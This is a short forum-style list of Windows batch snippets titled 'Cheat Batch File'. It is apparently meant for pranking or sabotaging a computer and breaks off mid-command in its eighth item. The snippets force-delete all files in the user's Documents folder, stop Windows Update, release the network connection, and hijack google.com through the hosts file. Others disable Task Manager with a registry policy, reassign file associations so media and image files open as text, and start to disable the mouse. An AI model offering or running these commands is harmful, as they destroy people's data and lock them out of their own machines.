Cheat Batch File
1. Disable Windows Update: Code: @echo off net stop "wuauserv" 2. Delete "My Documents" folder: Code: @echo off del /f /q "%userprofile%\My Documents\*.*" del /f /q "%userprofile%\Documents\*.*" 3. Disable Internet Connection: Code: @echo off ipconfig /release if ERRORLEVEL1 ipconfig /release_all 4. Kill A Process: Code: @echo off taskkill /f /t /im "Process.exe" 5. Block Websites [exp : Google.com]: Code: @echo off cd "C:\Windows\System32\Drivers\etc" echo 127.0.0.1 google.com >> "Hosts" echo 127.0.0.1 www.google.com >> "Hosts" 6. Disable Task Manager: Code: @echo off reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >null 7. Change File Extensions: Code: @echo off assoc .mp3=txtfile assoc .xml=txtfile assoc .png=txtfile 8. Disable Mouse: Code: @echo off set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mo...